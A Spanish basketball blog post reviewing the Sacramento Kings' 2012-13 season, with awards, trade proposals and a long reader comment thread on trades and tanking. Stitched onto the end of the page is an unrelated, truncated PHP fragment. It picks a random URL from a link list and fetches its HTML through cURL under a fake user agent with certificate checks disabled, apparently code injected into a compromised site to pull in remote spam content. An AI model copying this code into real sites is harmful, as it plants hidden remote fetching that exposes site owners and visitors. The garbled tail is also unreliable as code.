Sacramento Kings: Muy deficiente

02 de July de 2013 por Sancho88

Nuevo fracaso de los morados, que se volvieron a estrellar por séptimo año consecutivo en una Conferencia Oeste de la que no son ni juez ni parte desde 2006, último año en el que visitaron la postemporada. El supuesto proyecto ganador que intentan vender desde la franquicia orquestado alrededor de Cousins y Evans ha vuelto a hacer aguas por tercer año consecutivo, y muchos empiezan a dudar de la idoneidad de continuar un año más con la misma base.

Les pedíamos en el análisis previo superar las 30 victorias, pero no lo consiguieron. En parte, por un ejercicio de desidia y desobediencia, y en parte, por la incompetencia cada vez más evidente desde los despachos. Es obvio que el nuevo proceso que se inició el mes pasado, con el cambio de dueños y el cese de Geoff Petrie como General Manager, debería ser un acicate para impulsar un cambio de rumbo en la franquicia que les haga volver a creer en sus posibilidades. Verdaderamente Pete D’Alessandro, nuevo GM del equipo, tiene muchísimo trabajo por delante.

Aun así, el 28-54 conseguido por los Kings es su mejor record en las últimas 5 temporadas, aunque esto no debería ser motivo de celebración sinó todo lo contrario. El equipo bandea sin imaginación por la liga desde hace mucho tiempo y cada año un nuevo entrenador viene para estrellarse con un bólido manejado por jóvenes sin demasiada implicación. Esta vez, a mitad de temporada muchos jugadores se borraron y empezaron a criticar a Keith Smart por una rotación inconstante. Lo cierto es que Smart lo intentó todo pero fueron sus jugadores los que le fallaron y no le hicieron caso. Los 105 puntos de media recibidos por partido así lo demuestran y de nada les vale ser Top 10 en el ranking ofensivo de la NBA si son el mayor agujero de la liga en defensa. Estos serán los principales deberes para el nuevo entrenador, Mike Malone. De él depende ahora convertir al equipo en un proyecto serio desde atrás y capaz de luchar física y mentalmente durante todos los partidos. 

Las buenas noticias solo llegaron a Sacramento tras las votaciones del comité de dueños de la NBA que el 15 de mayo vetó la venta del equipo a Seattle y aprobaron el cambio de mandos en Sacramento. El empresario indio Vivek Ranadivé, multimillonario de una empresa de software y copropietario de los Warriors, es el nuevo dueño de los Kings y sustituye a los Maloof que desde hace prácticamente 3 años han mantenido en vilo a toda la ciudad de Sacramento intentando vender el equipo a ciudades como Anaheim, Virginia Beach y la propia Seattle. Finalmente, el trabajo realizado desde los despachos por el alcalde de Sacramento Kevin Johnson dio sus frutos y la votación fue aprobada por 22 votos a favor y 8 en contra, lo que garantiza la continuidad de los Kings en la capital de California. El montante de la operación ascendió finalmente a 535 millones de dólares, récord de venta de una franquicia de la NBA. Fue lo único digno de celebrar en una temporada que por lo demás fue un auténtico desastre.

PREMIOS

MVP: DeMarcus Cousins. El pívot formado en la Universidad de Kentucky fue por segundo año consecutivo el líder de los Kings y eso que solo tiene 22 años. Sus números son los de un All-Star pero jugar en un equipo perdedor no le favorece en este aspecto. Ha promediado esta temporada 17,1 puntos, 9,9 rebotes, 2,7 asistencias y 1,4 robos de balón en 31 minutos de juego, además de reducir su número de faltas con respecto al año pasado y mejorar ligeramente su porcentaje en tiros de campo hasta el 47%, la mejor marca de su carrera. No obstante, Cousins tuvo el dudoso honor de ser el jugador con más faltas técnicas de la liga y volvió a enfrentarse cara a cara con su entrenador una vez más. A la lista negra formada por Paul Westphal se unió esta temporada Keith Smart. Veremos qué pasa con Malone el año que viene. Aun así, más de la mitad de los equipos de la NBA ha preguntado por Cousins, quien ya ha pedido públicamente una mejora sustancial de su contrato con los Kings que de no conseguir acarrearía un intento por forzar su salida del equipo. Más les vale a los Kings trabajar con DeMarcus, mejorar su actúal contrato (4,9 millones la próxima temporada) y arroparle con un grupo de jugadores comprometidos para no frustrar definitivamente su inicio de carrera en la NBA. Solo así podrán retenerlo. De momento, ya han anunciado desde el equipo que este verano entrenará con Shaquille O’Neal. Y claro, el bueno de ‘Shaq’ ya ha asegurado que lo va a convertir en el mejor pívot de la liga. Menudo es él.

Rookie: Lamentablemente, este espacio debe quedar huérfano. Después del fatídico año de Thomas Robinson, la mayor decepción del pasado draft, y la venta del escolta Orlando Johnson a los Pacers en la noche del draft, la ‘añada’ de los Kings fue roma. Este hecho hizo reaccionar al equipo, que vendió a mitad de temporada al propio Robinson a los Rockets, junto a Tyler Honeycutt y Francisco García, y recibieron a cambio a Toney Douglas, Patrick Patterson y Cole Aldrich. Siempre quedará la incógnita de saber qué hubiera ocurrido si hubieran escogido al que iba un peldaño por abajo, Damian Lillard.

Sorpresa: Isaiah Thomas. El base ‘sophomore’ dio un paso adelante con respecto al año pasado y demostró que puede ser un base de garantías dentro de la liga. No es ni será una estrella pero teniendo en cuenta que fue elegido en la cola de la segunda ronda de 2011 su aportación tiene muchísimo mérito. 14 puntos, 2,6 rebotes y 4 asistencias son buenos números y más teniendo en cuenta que tuvo que luchar por ser titular con Aaron Brooks y posteriormente con Toney Douglas. A ambos les ganó la partida. Su actitud, trabajo y compromiso son indiscutibles.

Decepción: Aparte de la ya mencionada decepción de Thomas Robinson, que apenas firmó 4,8 puntos y 4,7 rebotes en 16 minutos de juego, antes de ser traspasado a los Rockets, la verdadera decepción fue Aaron Brooks. Ni rastro de aquel jugador que fue nombrado MIP en la temporada 2009/2010 por delante de Kevin Durant y Marc Gasol. Venía a resolver partidos gracias a su instinto anotador pero hizo su peor temporada desde que fuera ‘rookie’ y nunca estuvo en disposición de discutir el puesto de titular a Isaiah Thomas. En marzo fue ‘cortado’ y acabó la temporada en Houston, donde comenzó sus pasos como profesional en 2007. Allí tampoco aportó prácticamente nada y Patrick Beverley le apartó a la tercera línea de combate. Otros ‘cangrejos’ destacados del equipo fueron Marcus Thornton y James Johnson, por no hablar de la regresión anotadora y constante año tras año de Tyreke Evans, que al menos mejoró su selección de tiro e incluso firmó un ‘decente’ 33% en triples. Nos podríamos haber quedado con cualquiera de ellos.

Esfuerzo en vano: Jason Thompson. Su tamaño como ala-pívot lo hace imprescindible en los planes de los Kings. Todos los entrenadores que han pasado por Sacramento han confiado en él en los 5 años que lleva en la liga y siempre da el máximo tanto en defensa como en ataque. Sin demasiado talento, Thompson jugó todos los partidos de liga con unos promedios de 11 puntos, 6,7 rebotes y 1 asistencia en 28 minutos de juego. Su esfuerzo siempre es en vano en este equipo.

JUGANDO A GM

Hay muchas cosas que hacer en estos Kings, muchas operaciones para revivir a este ‘muerto viviente’. Para empezar, el ‘overbooking’ que hay formado en el ‘backourt’ del equipo es de aúpa, y las elecciones del draft no han hecho sino complicar aún más las cosas. El ‘salary cap’ será de 58,5 millones la próxima temporada, y los Kings tienen comprometidos actualmente algo más de 40. En la línea de bases no extendería la ‘qualifying offer’ sobre Toney Douglas por 3 millones de dólares. Su rol en el equipo no parece fundamental. Es mejor ahorrarse ahí el dinero. Además, la elección en segunda ronda del base formado en Detroit Ray McCallum parece completar el puesto de base junto a Isaiah Thomas. Éste tiene una ‘team option’ de poco menos de 900.000 dólares. Habría que renovarle cuanto antes pues su perfil encaja tanto de titular como de suplente. Su compromiso con el nuevo proyecto, la ciudad y el equipo es total. Es un jugador por el que merece la pena mojarse.

En el puesto de escolta la situación se ha complicado aún más si cabe con respecto al año pasado. Siempre decimos que Tyreke Evans y Marcus Thornton son incompatibles pero tras la elección en el número 7 del draft de Ben McLemore, pueden saltar chispas directamente en esta posición. Y siempre aparecerá la sombra de Jimmer Fredette, 4º en la escala de sucesión de Tyreke Evans actualmente. Pete D’Alessandro eligió al mejor jugador disponible, de eso no cabe duda, pero ahora tiene que hacer algunos movimientos para justificar su elección y adaptarla a la estructura del equipo.

Para empezar, hay que valorar muy seriamente si conviene firmar con Tyreke Evans una renovación millonaria. Si lo vemos con objetividad, los números que ha aportado en estos cuatro años merecen la pena, a pesar de que año tras año siga bajando sus prestaciones. Igualar una oferta multianual de hasta 10 millones al año sería razonable, pero más ya no. Con McLemore como escolta titular indiscutible (debería serlo, al menos en mi proyecto como Manager lo sería), Tyreke se tendrá que adaptar, o bien como base, o bien como alero. En defensa no hay problema, pues es capaz de defender a cualquier jugador en las tres posiciones exteriores, pero en ataque tiene muchos problemas para atacar a jugadores grandes que actúen como aleros, y es demasiado lento como distribuidor, además de acaparar mucho el balón y no crear prácticamente nada. Otra opción sería que McLemore se adaptara a la posición de alero, pero eso parece complicado. Es un jugador de primer año y ese esfuerzo lo debería hacer Tyreke. En principio, sí apostaría por renovarle. Malone y D’Alessandro apuestan por él, fue una de las caras visibles junto a Thomas, Webber y Mitch Richmond en las celebraciones por quedarse en Sacramento y si se centra es un jugador que aún hoy es potencialmente All-Star. Claramente, esta apuesta pasaría por traspasar a Thornton y a Fredette. Ambos ya han sido puestos en el mercado y parece que los Jazz estarían interesados en firmar a Fredette, que fue estrella universitaria en Utah. Les pediría dos segundas rondas de 2014 y 2015 por él. Por Thornton intentaría un traspaso con los Indiana Pacers a cambio de Danny Granger. Incluiría a Travis Outlaw y una primera ronda en el próximo draft, que siendo de los Kings tendría un gran valor en principio.

Así, con una base cimentada sobre Evans, Thomas, McLemore y Granger, quedaría por resolver el juego interior. En el puesto de alero John Salmons sería suplente de Granger. Su ‘expiring’ podría aprovecharse en un traspaso a mitad de temporada. Ni hablar de extender la ‘qualifying offer’ sobre James Johnson. No lo ha merecido en ningún momento. En el puesto de ala-pívot lo dejaría como está. La pareja Jason Thompson-Patrick Patterson está muy bien, no es necesario tocar nada ahí. Y, por último, en la posición de pívot habría que arreglar la renovación de Cousins. Con sus números está en disposición de pedir prácticamente lo que le dé la gana. Viendo lo que cobran otros pívots de la liga mucho peores que él, no sería descabellado verle firmar una extensión de su actual contrato hasta 2017 por 15 millones al año, un 60×4 quizá. Lo que pida habría que dárselo. Eso sí, exigiéndole un compromiso y una ética de trabajo que aún no ha demostrado. Como suplente Chuck Hayes no me convence, pero es imposible traspasarle, así que toca comerse los 11,7 millones que le quedan por cobrar hasta junio de 2015. Se podría firmar un contrato no garantizado a Cole Aldrich. El pívot formado en Kansas no lo hizo nada mal en los minutos que tuvo y sería un buen recambio para Cousins.

El equipo quedaría así:

PG: Isaiah Thomas, Ray McCallum
SG: Ben McLemore, Tyreke Evans
SF: Danny Granger, John Salmons
PF: Jason Thompson, Patrick Patterson
C: DeMarcus Cousins, Chuck Hayes, Cole Aldrich

Comenta

22 comentarios a esta entrada

  1. rumbero dice:
    #1

    Vaya batería de SG que tienen en SAC por dios.
    La oferta de los Pelicans a Evans marcará lo que hagan estos Kings, pero él o Thornton deben salir. El Granger – Thornton lo compro, aunque igual a Vogel no le convence tanto lo manta que es Marcus en defensa por mucho que esa segunda unidad necesite anotación como el comer. Además que hayan dejado pasar a Burke, McCollum o Carter-Williams es porque le van a dar confianza a Thomas (que estoy de acuerdo en que se ha ganado de sobras el puesto restándoles minutos a los pelacañas de Brooks y Dougals) y porque apuestan que McLemore les salga bien, pero para eso tiene que jugar.
    Pero aquí el tema gordo es Cousins. Como dices le van a tener que pagar lo que pida pese a su cabecita. Aparte del entreno con Shaq tendrían que probar con él algun tratamiento de shock al estilo de la Naranja Mecánica para llevarlo por el buen camino…no se puede tirar ese talento por la borda

      Citar

  2. Sancho88 dice:
    #2

    que no se pasen al estilo alguien voló sobre el nido del cuco… que al final le sacan con las patas por delante, jajaja. Un poco de electroshock con DeMarcus bien, pero con un límite

      Citar

  3. simon dice:
    #3

    El Thorthon- Granger podria ser un buen traspaso… pero en serio meterias la primera ronda??

      Citar

  4. simon dice:
    #4

    Se ha cortado el anterior comentario. Digo que Granger sano es un grandísimo jugador, pero aun con Granger este equipo no lo veo entrando en PO y su elección seria top 10 si o si… Granger vale un microondas decente como Marcus y un pick top 10 de un draft tan bueno como el del año que viene?

      Citar

  5. Sancho88 dice:
    #5

    espera simon, tienes razon. Ayer en la cama lo medité, no tiene sentido lo de la primera ronda, si acaso una ronda protegida o del año 2015 o una segunda ronda o algo así. La primera ronda sería muchísimo porque además Granger es expiring, y te hace un Dwight Howard y ya te ha dejado en bragas y sin elección. Podríamos meter a Thornton+Outlaw+Rondica a cambio de él, ciertamente

      Citar

  6. Denise dice:
    #6

    “”intentaría un traspaso con los Indiana Pacers a cambio de Danny Granger. Incluiría a Travis Outlaw y una primera ronda en el próximo draft, que siendo de los Kings tendría un gran valor en principio.””

    Todo el mundo diciendo que el Draft del 2014 es muy bueno, y tu quieres traspasar una primera ronda de los Kings que puede ser facilmente un top 5??

    Mi politica como GM sería todo lo contrario, intentar quitarme de enmedio a toda la morralla (Thornton, Tyreke y Salmons por rondas de Draft) y hacer tanking descaradamenet
    – Thornton a Lakers a cambio de Artest (expiring) y la primera ronda de Lakers que no descartaría que se quedasen fuera de PO.
    – Tyreke a Pelicans a cambio de Vazquez y Jason Smith
    – Salmons que es expiring, lo traspasaría en febrero por una Primera Ronda ó Segunda Ronda alta mas otro jugador paquetillo de contrato bajo para cuadrar salarios a cualquier equipo de zona noble que quiera mas profundidad de cara a los Playoffs.
    Así tendría para la 14-15 tres primeras rondas (la mia top 5, la de Lakers entre la 15 y la 20, y otra entre el 25-30), y mucho espacio salarial para agentes libres.

      Citar

  7. simon dice:
    #7

    Pero esos traspasos que comentas denise no los aceptan ni de coña.
    – Marcus Thorthon son 8 millonazos… y Lakers quiere/necesita el máximo espacio disponible para entrar con fuerza en la agencia libre.
    -Los Pelicans pueden firmar a Evans como ALR, para que van a perder a Vasquez y Smith a cambio un tio al que van a sobrepagar de todos modos…
    En lo que si estoy de acuerdo es en lo del tankeo.

    PD: Cuantos equiopos tanqueando desde el comienzo… A bote pronto: Orlando, Suns, Bobcats, Sixers, Toronto, Bucks… y equipos que cuando se vean sin opciones tambien lo haran tipo Detroit, Cavs e incluso dependiendo de lo que piyen en la agencia libre Hawks. Y tambien a ver que hace Cuban pero parece que no se van a comer ni siquiera las migajas del pastel…

      Citar

  8. Sancho88 dice:
    #8

    Veo bien lo de los Pelicans que comentas, pero en vez de Smith yo metería a Robin López, porque para tener a Smith ya tienen a Jason Thompson y Patterson. Además los Kings necesitan un tipo grande de más de 7 pies, y Smith es grande, pero es alérgico a la zona. Tampoco puedes hacer tanking descaradamente como tus Magic, porque no sé si te has dado cuenta que hay un señor que va a ser desde este año all star todas las veces que le de la gana hasta que se retire (Cousins), y si tanqueas descaradamente, ese señor se va a pirar también descaradamente. Y, personalmente no sé tú, pero tanquear por tanquear no tiene ningún sentido. Muchos equipos se matarían por tener a Cousins, así que en mi opinión, lo que hay que hacer es sumar efectivos a su alrededor desde ya para poder competir. Lo de Vásquez+López a cambio de Tyreke lo veo, lo de ir a por Granger lo veo también, cosas que vea Cousins que están intentando ayudarle para ir a Playoffs. Porque si no, que leches, que desmantelen el equipo y empiecen otra vez de cero, y eso no tendría sentido porque el equipo lleva desmantelado muchos años y ahora mismo con Tyreke y DeMarcus hay dos proyectos muy serios de all-star, y se trata de sacar valor por Tyreke para hacerle a Cousins un tio grande y respetado en la liga. Lo de tanquear se lo dejo a tus Magic hermano, no por nada, sino porque allí la cagasteis con Howard (es mi opinión), cuando podiais haber sacado un buen traspaso por Pau o haber sacado algo, que incluso tú mismo lo defendiste en su momento, creo recordar.

    Y ojo, no digo que no le esté saliendo medio bien a Magic. El año pasado fue una mierda, pero mira, os ha salido un futuro crack llamado Tobías Harris, lo de Vucevic es para flipar, pero todo lo demás está por hacer, y sin embargo los Kings tienen mejor base ahora mismo. Así que, suerte con Oladipo, gracias por dejarnos a McLemore y pique a muerte por ver quien tanquea más entre Magic y Kings, jejeej. A ver qué pasa…

      Citar

  9. Sancho88 dice:
    #9

    Ostia, la movida era Pau+Bynum si mal no recuerdo por Howard… Fíjate si con eso ya y sin necesidad de tanquear habríais seguido siendo elite del Este

      Citar

  10. Sancho88 dice:
    #10

    Como decía el artículo que sacasteis ayer alguien en un comentario, mentalidad de pequeño, equipo pequeño. No hermano, Cousins se merece todo, y el indio tiene pasta. Que compre jugadores buenos hasta que reviente

      Citar

  11. txusma dice:
    #11

    Sancho88:
    Ostia, la movida era Pau+Bynum si mal no recuerdo por Howard… Fíjate si con eso ya y sin necesidad de tanquear habríais seguido siendo elite del Este

    A toro pasado y teniendo en cuenta que Andrew Bynum no ha jugado todo el año y que Pau tb ha estado tocado, sigues pensando que un Howard x Bynum + Gasol hubiera sido mejor idea? Q los Magic se hicieron con Vucevic y Mo Harkless…

      Citar

  12. Sancho88 dice:
    #12

    ya ya, hubiera sido un error, pero en su momento lo podían haber firmado, o eso se habló por lo menos, y aquí muchos defendimos ese traspaso, que era mejor que nada para los Magic. A toro pasado, Bynum está haciendo el gilipoyas y Pau se está poniendo ciego de panceta, pero bueno, uno nunca sabe. No siempre tanquear es la solución, eso es lo que quiero decir, y en el caso de los Kings no creo que lo sea

      Citar

  13. Denise dice:
    #13

    Sancho88: Ostia, la movida era Pau+Bynum si mal no recuerdo por Howard… Fíjate si con eso ya y sin necesidad de tanquear habríais seguido siendo elite del Este

    Era Pau y Bynun por Ryan Anderson y DH

    Hennigan, el GM de los Magic los rechazó por el historial de lesiones de Bynum. En ese aspecto, gasta mucho cuidado y no arriesga, como ahora que no ha querido a Noel, y también pasó de Sullinger de los Celtics.
    Creo que el Harkless, Vucevic, Afflalo les ha salido mejor.

    ¿Que os hace pensar que los Magic estan haciendo tanking? Estan recopilando jovenes pero el año pasado se vio un equipo luchador y aplicado, no uno desanimado y decaido.
    Con tanta morralla que hay en el Este + Bucks, Celtics y posiblemente Hawks que van a ir para abajo, no descartaría que Orlando quedase 8º y en Playoffs. Aunque es mejor idea la de tankear y pillar un Top 10.

    PD: lo nombres de mis traspasos propuestos es lo de menos, mi idea es que los Kings deben tankear. Y yo creo que los Lakers aceptarían a Thornton por Artest. Marcus es un jugador costoso pero util, y no tiene un contrato largo.

      Citar

  14. Sancho88 dice:
    #14

    Hombre, no tanquearon, pero con lo que tenían la mayoría de los partidos morían en el tercer cuarto. Sabes perfectamente que cuando no juega Nelson (por lesión o lo que sea) ahí no crea ni perry, y que en ocasiones la única solución es dársela a Vucevic, que es un genio recibiendo en poste bajo y a media distancia no va mal, o que Afflalo o Redick hicieran la guerra por su cuenta y se tiraran ellos solos contra el mundo. En mi opinión, los Magic tendrían que intentar sacar algo por Afflalo y Davis. No les iría mal un Jamaal Crawford o un Eric Bledsoe, que son los nombres que más suenan (bueno, lo de Crawford me lo acabo de inventar, pero quedaría bien, jejej).

      Citar

  15. Denise dice:
    #15

    Ah, y se me olvidó, igual a Cousins no le importa tankear. Mientras mas panolis tenga a su alrededor, mas tiros, mas puntos, mas estadisticas y a fin de cuentas, mas dinero en su bolsillo en proximos contratos.
    Obviamente, no sé en que piensan las neuronas de Cousins en estos momentos, pero con lo joven que es, apostaría a que para el año que viene preferiría irse a los 25 puntos y 12 rebotes de media y quedar de los ultimos, a hacer un 18-9, meterse en PO y llevarse un 4-0.

    Y los Kings, si planean quedarse con Tyreke, debieron draftear a Burke.

      Citar

  16. Sancho88 dice:
    #16

    D’Alessandro dijo que quería a McLemore desde el principio, incluso hubo llamadas con los Suns para negociar por el pick 5 para llevárselo sí o sí por miedo a que se lo quitaran antes. Y dicen también que en la sala donde se reunen los dirigentes de los Kings él dijo en todo momento que iban a draftear a McLemore y todos se reían porque pensaban que era imposible que cayer atan abajo. Ok, típica historia para vender humo, yo no me la creo, que en los Kings siempre venden muchos petardos y luego ná. Luego también han dicho que draftearon al mejor posible. Total, evidentemente, el pick es para dejar escapar a Tyreke, no sin antes firmarle su correspondiente sign and trade a cambio de un base y un interno grande. Si se le deja escapar así como así, solo se entendería en el caso de que estuviesen ahorrando salarios para ir a por un alero tipo Iguodala, Josh Smith o Kirilenko.

    Y, en tercer lugar, si no hay sign and trade y se le deja escapar a los Pelicans y no se usa el espacio salarial para ir a por un alero de categoría, lo que vosotros defendeis como tanking y yo digo que para los aficionados Kings es una falta de respeto, entonces iré yo mismo a Sacramento y defecaré cerca del Arco Arena para que huela muy mal.

    Es que claro, es muy bonito tanquear y lavar la ropa en Magic, Boston, Cleveland… lugares donde ha habido buenos resultados en la última década y es todo la hostia de bonito. Pero tanquear en Sacramento… vnega por dios, llevamos así años y años, y la peña está cansada y quiere ilusión, y si para ti un 4-0 en primera ronda te parece una mierda porque los Magic llegaron a finales y al final ese es el premio gordo, dale al Arco Arena al menos la posibilidad de que le metan un 4-0 en primera ronda, ya veras como prefieren eso a tanking.

    Yo a los Kings los veo como los Warriors, un sitio que se ha cansado de ser mercado pequeño, equipo de mierda y todos esos topicazos y quieren empezar a ganar ya.

      Citar

  17. Denise dice:
    #17

    Sancho88: Pero tanquear en Sacramento… vnega por dios, llevamos así años y años, y la peña está cansada y quiere ilusión, y si para ti un 4-0 en primera ronda te parece una mierda porque los Magic llegaron a finales y al final ese es el premio gordo, dale al Arco Arena al menos la posibilidad de que le metan un 4-0 en primera ronda, ya veras como prefieren eso a tanking. Yo a los Kings los veo como los Warriors, un sitio que se ha cansado de ser mercado pequeño, equipo de mierda y todos esos topicazos y quieren empezar a ganar ya.

    Da igual que hayas ganado ultimamente 5 anillos ó lleves años sin entrar en Playoffs, a la gente le mola mas ver un equipo ganador, con buen balance y vivier el ambiente del playoffs, eso es indudable.
    Ahora, yo me pongo en la piel del GM ó propietario, que es lo que estamos haciendo aquí, y para tener un equipo mediano teniendo en cuenta el nivelazo de equipos que hay en el Oeste, que te van a dar un 4-0, pues quizas es mejor no gastar mucho dinero, e intentar ir paso a paso tranquilamente, reunir una serie de jovenes (como los Cavs, Wizards, ó Magic están haciendo) y despues fichas a agentes libres buenos, aunque tengas que sobrepagarle dado el mercado.
    No sé, llamame amarrategui, pero si yo fuese propietario, preferiría gastarme 50 millones y tankear, que gastarme 65 mas las multas para llevarme claramente un 4-0.
    Los dolares hay que gastarselos en el momento oportuno, no gastar por gastar, en Orlando se sabe mucho de eso e los ultimos años, en 2010 especialmente tenía un equipazo de 90 kilos que olía a anillo, pero los ultimos años de Otis Smith han sido un despilfarro, tener al equipo en 90 millones + multas sabiendo en Octubre que tu limite estaba en 2º ronda.

      Citar

  18. Esteban dice:
    #18

    para sancho88 que me voy a morir de risa!!! jajaja

    mandar a thorton y sus dos años de co trato pot 8 millones, mas a outlaw y sus dos años de contraro por 4 millones por el expiring de granger? vamos que los pacers no son idiotas

    en todo caso, el trade deberia haber sido el año pasado con thorton y evans por granger, hoy el valor de granger como expiring es mucho mayor y evas ya no cobra 5 millones

      Citar

  19. Esteban dice:
    #19

    Denise: o tiene sentido lo de la primera ronda, si acaso una ronda protegida o del año 2015 o una segunda ronda o algo así. La primera ronda sería muchísimo porque además Granger es expiring, y te hace un Dwight Howard y ya te ha dejado en bragas y sin elección. Podríamos meter a Thornton+Outlaw+Rondica a cambio de él, ciertamente

    aqui hay cosas con bastante sentido

    evans y thorton, ambos deberian salir, uno para trtaer un base y el otro para traer un alero

    uno por vasquez y otro por granger y dejando a Mclemore de escolta, sumado a cousins puede tener cirto sentido de actualidad y futuro

      Citar

  20. Sancho88 dice:
    #20

    Esteban, pues es lo que yo digo, te hará mucha gracia, pero estamos diciendo exactamente lo mismo, Te recuerdo que Thornton venía de hacer casi 20 puntos de media el año pasado, y este año no lo ha hecho porque ha jugado muy pocos minutos y no ha tenido confianza de Smart. Pero este tío con confianza, clava una, se crece, el público le quiere y te mete 30 puntos en una noche. Y no son inventos, sino un montón de partidos que lo ha hecho, sobre todo el año pasado como te digo. Que te parezca de risa, ok, pero supongo que al menos ese trade sí se lo plantearía Larry Bird. Sabes de sobra que el precio de Granger ahora mismo no es muy alto en el mercado. Un año fuera de las pistas, y este año cuando ha jugado, ha hecho el ridículo. Por tanto, qué esperas a cambio de él? Yo creo que la oferta que yo pongo sobre la mesa es bastante coherente y les vendría bien a los Pacers. O si no, querido Esteban, por qué tus queridos Pacers han drafteado a Solomon Hill? Me parece que porque va a ser suplente de George y quieren traspasar a Granger. Te sigue dando tanta risa no?

      Citar

  21. Esteban dice:
    #21

    Sancho88:
    Esteban, pues es lo que yo digo, te hará mucha gracia, pero estamos diciendo exactamente lo mismo, Te recuerdo que Thornton venía de hacer casi 20 puntos de media el año pasado, y este año no lo ha hecho porque ha jugado muy pocos minutos y no ha tenido confianza de Smart. Pero este tío con confianza, clava una, se crece, el público le quiere y te mete 30 puntos en una noche. Y no son inventos, sino un montón de partidos que lo ha hecho, sobre todo el año pasado como te digo. Que te parezca de risa, ok, pero supongo que al menos ese trade sí se lo plantearía Larry Bird. Sabes de sobra que el precio de Granger ahora mismo no es muy alto en el mercado. Un año fuera de las pistas, y este año cuando ha jugado, ha hecho el ridículo. Por tanto, qué esperas a cambio de él? Yo creo que la oferta que yo pongo sobre la mesa es bastante coherente y les vendría bien a los Pacers. O si no, querido Esteban, por qué tus queridos Pacers han drafteado a Solomon Hill? Me parece que porque va a ser suplente de George y quieren traspasar a Granger. Te sigue dando tanta risa no?

    sancho, me da risa por que ni loco los pacers se comerian los contratos de thrton y otlaw a cambio de el de granger

    si granger tuviera dos años de contrato, bueno quiza asi podria tener algun color, pero siendo expiring, estoy seguro que los pacers preferiran mantener este añlo a granger como sexto hombre y librarse de el a fin de curso, que comerse 12 millones por los proximos dos años, por, thorton que vale, anota y puede ser un buen sexto hombre pero poco mas y outlaw que no sirve absolutamente para nada, ni este año ni el proximo

    veo a thorton algo potable en indiana, pero no me cierra que se cuajen salarios con outlaw, ya que ninguno de los dos contratos son realmente buenos, y los pacers sumarian un año mas de millones a su nomina a cambio de muy poco

    no te olvides que indiana esta ajustado con los sueldos, incluso el de granger no encaja, asi que dudo que sumen mas millones a la proxima temporada cuando deben renovar a george

    incluso veo mas posible el pack thorton y hayes, por que si vamos a sumar salarios que no tenemos comprometidos para la proxima temporada, que al menos sea en alguien que de alguna utilidad, sumar los 3 millones de outlaw, para el proximo año cuando quien se iria seria una expiring, no tiene el mas minimo sentido

    toma todo sentido, si los kings entregaran su primera ronda, incluso protegida en un top 10, pero eso no sucedera, no es tan la devocion que tienen por granger o por sacarse en encima a outlaw y thorton como para pagar tanto

      Citar

  22. Esteban dice:
    #22

    como se la estaran pensando los pacers, que hace un par de temporadas, parecian no tener ninguno contrato malo digno de amnistiar, y se la aplicaron a james posey que tenia un año de contrasto y 7 millones, cuando esos 7 millones no le sirvieron de nada

    hoy por hoy, el contrato de granger, en aquel entonces jugador franquicia del equipo, es digno de amnistiar, y los pcers no cuentan con dicha amnistia

    igualmente, con un solo año de contrato y dado que aun puede aportar, granger deberia ser aceptado por varios equipos con espacio a cambio de una trade exeption, caso los cavs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>